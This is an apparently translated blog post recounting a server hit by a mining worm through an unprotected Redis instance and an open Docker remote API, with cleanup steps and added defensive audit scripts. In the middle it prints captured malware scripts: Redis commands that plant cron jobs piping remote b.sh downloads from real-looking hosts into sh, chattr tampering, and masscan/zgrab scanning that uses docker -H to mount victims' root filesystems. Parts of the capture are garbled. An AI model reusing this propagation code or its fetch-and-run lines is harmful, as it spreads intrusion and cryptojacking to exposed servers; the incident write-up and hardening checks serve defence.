Today, when I opened the server and tried to get into MySQL in Docker to test sql_mode, I suddenly found that I could not get into MySQL at all. Then I looked at MySQL, and not only MySQL but all the other applications had died as well.

Then I tried to restart it. That did not work. I opened the monitor and used the top command to check the process information, and found that CPU usage was at 100%, which gave me the following.

kswapd0 was using a lot of CPU. The explanation I found was that with insufficient physical memory, the swap partition and memory page swapping are used to exchange data, which pushes CPU usage up. (Later I realized it was not kswapd0 at all, but a Trojan disguised as kswapd0 to fool me.)

Process 2394 was consuming the most CPU, so I killed it.

CPU usage came down...

But I also found that process 9951, pnscan, was using quite a lot as well, so I followed the same routine and searched Baidu for it.

That is when I realized the server had been hit by a virus. I immediately went looking for a removal solution and searched all over the Internet; I had a rough idea that the intrusion had come through Redis.

Seeing the familiar port 6379 confirmed beyond doubt that the intrusion came through Redis. I remembered that my Redis instance was only used for testing, so it had no password set.

I found the pnscan process, killed all of its processes, and deleted the pnscan script in the /usr/local/bin directory:

rm -rf pnscan

When that was done I thought everything would be all right, but it was still taking up a lot of CPU.

I tried a lot of approaches, but still could not solve it.

Then I happened to run the netstat -ant command to check the network connection status.

I did not know until I checked.

2375, a very familiar port: I had opened it the day before yesterday to connect remotely for a Docker deployment project.

Suddenly I realized that there was more than one virus.

Know yourself and know your enemy, and you will not be imperiled in a hundred battles, so I went and found this blog post: Docker exposed port 2375 server attack solution!

Anyone can operate your Docker with just the following command:

docker -H tcp://<server IP>:2375 <docker command>

From Docker's official website:

Warning: Changing the default docker daemon binding to a TCP port or Unix docker user group will increase your security risks by allowing non-root users to gain root access on the host. Make sure you control access to docker. If you are binding to a TCP port, anyone with access to that port has full Docker access; so it is not advisable on an open network.

That told me of a possible intrusion.

Solution: for now, I have turned off the remote connection on port 2375.

I did this by editing /lib/systemd/system/docker.service with vim.

The image below shows the line I had added; delete it.

Then run:

systemctl daemon-reload
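
As an added example (not from the original post), here is a small shell check I would run against docker.service to tell the exposed form apart from one that keeps remote access but requires TLS client certificates. The certificate paths are assumed; --tlsverify and the related --tls* options are real dockerd options, and 2376 is Docker's conventional TLS port.

```shell
#!/bin/sh
# Added example, not from the original post: check docker.service ExecStart lines for the
# TCP listener that port 2375 exposed here, and distinguish it from a TLS-verified one.

# Constructed ExecStart lines. The first is the risky form; the second is a hardened one
# that keeps remote access but requires client certificates (certificate paths assumed);
# the third only listens on the local socket.
RISKY='ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375'
HARDENED='ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2376 --tlsverify --tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem --tlskey=/etc/docker/server-key.pem'
LOCAL_ONLY='ExecStart=/usr/bin/dockerd -H fd://'

# Return 0 (true) when the line binds the daemon to a TCP socket without --tlsverify.
# Plain --tls only encrypts; without --tlsverify any client is still accepted.
docker_api_exposed() {
    case "$1" in
        *"-H tcp://"*|*"-H=tcp://"*|*"--host tcp://"*|*"--host=tcp://"*)
            case "$1" in
                *--tlsverify=false*) return 0 ;;
                *--tlsverify*) return 1 ;;
                *) return 0 ;;
            esac ;;
        *) return 1 ;;
    esac
}

# Report every ExecStart line of a unit file; meant for /lib/systemd/system/docker.service.
audit_docker_unit() {
    grep '^ExecStart=' "$1" | while IFS= read -r line; do
        if docker_api_exposed "$line"; then
            echo "EXPOSED: $line"
        else
            echo "ok: $line"
        fi
    done
}
```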

Continue with the [scan] process:

ps -ef | grep scan

I went into the /usr/share directory and found two suspicious programs. Why were they so obvious?

Curiosity made me want to see what was written inside the shell scripts.

[scan], the captured part:

#! /bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
function SecureTheSystem(a){
SYSFILEARRAY=(pstree kill pkill htop netstat ss lsof  wget wge wdl curl cur cdl sysctl )
for SYSFILE in ${SYSFILEARRAY[@]}; do
SYSFILEBIN=`which $SYSFILE` 2>/dev/null 1>/dev/null
tntrecht -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chmod -x $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr +i $SYSFILEBIN 2>/dev/null 1>/dev/null
tntrecht +i $SYSFILEBIN 2>/dev/null 1>/dev/null
done
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht +i -R $SYSTEMFILE  2>/dev/null 1>/dev/null
chattr +i -R $SYSTEMFILE  2>/dev/null 1>/dev/null
done
}
sleep 1
    if[-f "/bin/ps.original" ]
    then
        ps.original -fe|grep pnscan |grep -v grep
    else
        ps -fe|grep pnscan |grep -v grep
    fi
if [ $? -ne 0 ]
then
        rm -rf .dat .shard .ranges .lan 2>/dev/null
        sleep 1
        echo 'config set dbfilename "backup.db"' > .dat
        echo 'save' >> .dat
        echo 'config set stop-writes-on-bgsave-error no' >> .dat
        echo 'flushall' >> .dat
        echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
        echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
        echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
        echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
        echo 'config set dir "/var/spool/cron/"' >> .dat
        echo 'config set dbfilename "root"' >> .dat
        echo 'save' >> .dat
        echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
        echo 'save' >> .dat
        echo 'flushall' >> .dat
        echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
        echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
        echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
        echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
        echo 'config set dir "/etc/cron.d/"' >> .dat
        echo 'config set dbfilename "zzh"' >> .dat
        echo 'save' >> .dat
        echo 'config set dir "/etc/"' >> .dat
        echo 'config set dbfilename "crontab"' >> .dat
        echo 'save' >> .dat
        sleep 1
        pnx=pnscan
        [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
        [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
        while true; do
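
The script above gives three things a defender can look for on a host like this one: Redis and the Docker API listening on every interface (what netstat -ant revealed earlier), cron entries that pipe a download into a shell (what the script writes through Redis), and system binaries made immutable with chattr +i (what its SecureTheSystem function does). As an added example, not from the original post, the shell functions below check for each of these; the netstat, crontab and lsattr samples are constructed, and the host name in the cron sample is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original post: flag the footholds seen in this incident in
# plain text captured from the host, so each check can run over real command output.

# Constructed sample in the layout of `netstat -ant`.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2375            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN'

# Constructed crontab lines; the first has the shape the captured script writes via Redis.
SAMPLE_CRON='*/2 * * * * root curl -fsSL http://malicious.example/b.sh | sh
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf'

# Constructed `lsattr` output: an "i" in the flag field is the immutable bit the script sets.
SAMPLE_LSATTR='----i---------e------- /usr/bin/yum
--------------e------- /usr/bin/ps
----i---------e------- /usr/bin/netstat'

# Print LISTEN sockets for Redis (6379) or the Docker API (2375/2376) bound to all interfaces.
exposed_listeners() {
    printf '%s\n' "$1" | awk '$6 == "LISTEN" && $4 ~ /^(0\.0\.0\.0|::):(6379|2375|2376)$/ { print $4 }'
}

# Print cron lines that fetch a script with curl/wget (or the renamed copies cd1/wd1 seen in
# the captured script) and pipe it straight into sh or bash.
suspicious_cron() {
    printf '%s\n' "$1" | grep -E '(curl|wget|cd1|wd1)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Print files carrying the immutable attribute, which is why chattr -i is needed before
# a tampered yum or ps can be repaired.
immutable_files() {
    printf '%s\n' "$1" | awk '$1 ~ /i/ { print $2 }'
}

# On a live host, feed real output instead of the samples, for example:
#   exposed_listeners "$(netstat -ant)"
#   for f in /etc/crontab /etc/cron.d/* /var/spool/cron/*; do suspicious_cron "$(cat "$f")"; done
#   immutable_files "$(lsattr /usr/bin/* 2>/dev/null)"
```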

[MASS], the captured part:

#! /bin/bash
if[-f /bin/cd1]; then aabb=/bin/cd1echo "cd1 exist"
elif [ -f /bin/curl]; then aabb=/bin/curl
echo "curl exist"
else
echo "curl not exist,use yum reinstall"
yum -y remove curl&&yum -y install curl
fi

chmod +x /usr/bin/zgrab

dAPIpwn(){
range=The $1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo ' ')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port- HTTP = '/ v1.16 / version - the output - the file = 2 > / dev/null | grep - E' ApiVersion | client version 1.16 '| jq - r. IP)'";

for ipaddy in ${! rndstr}do

TARGET=$ipaddy:$port

echo '# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #'
$aabb -sLk http://107.3.150/input/da.php? vuln=$TARGET -o /dev/null
echo $TARGET

timeout -s SIGKILL 240 docker -H $TARGET run --rm -v /:/mnt alpine chroot /mnt/ /bin/sh -c "if ! type curl >/dev/null; then apt-get install -y curl; apt-get install -y --reinstall curl; yum clean all; yum install -y curl; yum reinstall -y curl; fi; echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\">/etc/crontab && echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\">/etc/cron.d/zzh"

done
}


My Redis port 6379, and ports 2375 and 2376, had all been hit.

Since I had already backed them up (for later analysis: know yourself and know your enemy), I ruthlessly ran rm -rf on them.

Then I ran top.

I found a process, masscan, that came back no matter how I killed it or restarted.

So I looked at the scheduled tasks in /var/spool/cron/ and found the reason.

Without further ado, after recording it: rm -rf root.

And then it started again.

After a lot of searching I found that the malware processes went well beyond masscan.

Finally I found a relevant article about this mining Trojan: Tencent Security intercepts the latest variant of the TeamTNT mining Trojan; an IRC backdoor is installed on the compromised host, so attackers can achieve any purpose.

It exploits the Docker Remote API unauthorized access vulnerability, spreads through SSH attacks, and installs an IRC backdoor. The use of masscan and zgrab for outbound scanning that eats bandwidth, as mentioned in the article, matches what the figure above shows.

Next I went to uninstall masscan and zgrab, but when I tried, I found that yum had been sabotaged too.

When I tried to change the contents of yum, it told me the file was read-only; then I tried to change the permissions and found that I could not change them either.

Running ls -l yum:

---xr-xr-x. 1 root root 801 Nov 5 2018 yum

chattr -i yum

Then I modified the yum interpreter.

I used the find command to locate masscan (find -name masscan), found the executable in a bin directory, and deleted it directly.

I'm about to cry: [mass] appeared again. Now I found an even more suspicious process, systemd-journal. I searched for it: dude, it is one letter short of systemd-journald. This is definitely a Trojan process.

After struggling with it for a while, I still could not solve it completely. Then I killed the process and it was gone, and I watched the process list for changes. I watched for a long time and [mass] did not reappear, but the Docker containers were broken.

Finally I reset the server and switched to Debian.

There seem to be no Trojans now, but my environment was destroyed. Too bad. System security really is important. I sometimes hear a friend (it really is a friend) say that their database was hacked and held for ransom, or that their systems were mining; in fact all of this can be avoided. In my later study and work I will focus more on system security, and in the future I will study vulnerabilities and viruses further and learn how to defend against them.

The reason the server was compromised this time is mainly that Redis had no password set and Docker did not do any authentication after the remote API was opened, and criminals used these weaknesses to attack. Although it is just a learning environment, I still need to strengthen security in the future.
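
The Redis half of that root cause is visible in redis.conf. As an added example (not from the original post), here is a shell audit of the settings whose absence let the captured script redirect CONFIG SET dir/dbfilename into cron directories: a weak configuration like the test setup described above beside a hardened counterpart. The requirepass value is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original post: audit a redis.conf for the settings whose
# absence let the captured script turn CONFIG SET dir/dbfilename into a cron file write.

# Constructed configs. WEAK_CONF matches the test-only setup described in the post;
# HARDENED_CONF is the counterpart (the requirepass value is a placeholder, not a real secret).
WEAK_CONF='bind 0.0.0.0
protected-mode no
port 6379'
HARDENED_CONF='bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""'

# Print one finding per line; print nothing when every check passes.
redis_findings() {
    conf=$1
    printf '%s\n' "$conf" | grep -Eq '^requirepass[[:space:]]+[^[:space:]]+' \
        || echo "no requirepass: anyone reaching the port gets full access"
    printf '%s\n' "$conf" | grep -Eq '^protected-mode[[:space:]]+yes' \
        || echo "protected-mode is not yes"
    ! printf '%s\n' "$conf" | grep -Eq '^bind[[:space:]]+(0\.0\.0\.0|::)' \
        || echo "bound to all interfaces"
    printf '%s\n' "$conf" | grep -Eq '^rename-command[[:space:]]+CONFIG[[:space:]]+""' \
        || echo "CONFIG not disabled: dir/dbfilename can be pointed at cron directories"
}

# Number of findings, handy as an exit status for a monitoring job.
redis_finding_count() {
    redis_findings "$1" | grep -c .
}
```

On a live host, run redis_findings "$(cat /etc/redis/redis.conf)" (path varies by distribution).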

Attached is the Alibaba Cloud vulnerability database link: Docker Daemon API unauthorized access vulnerability

From another point of view, though, I think I learned a lot and gained experience, and rebuilding the environment also consolidates my knowledge. Everyone is welcome to comment and leave valuable experience and suggestions.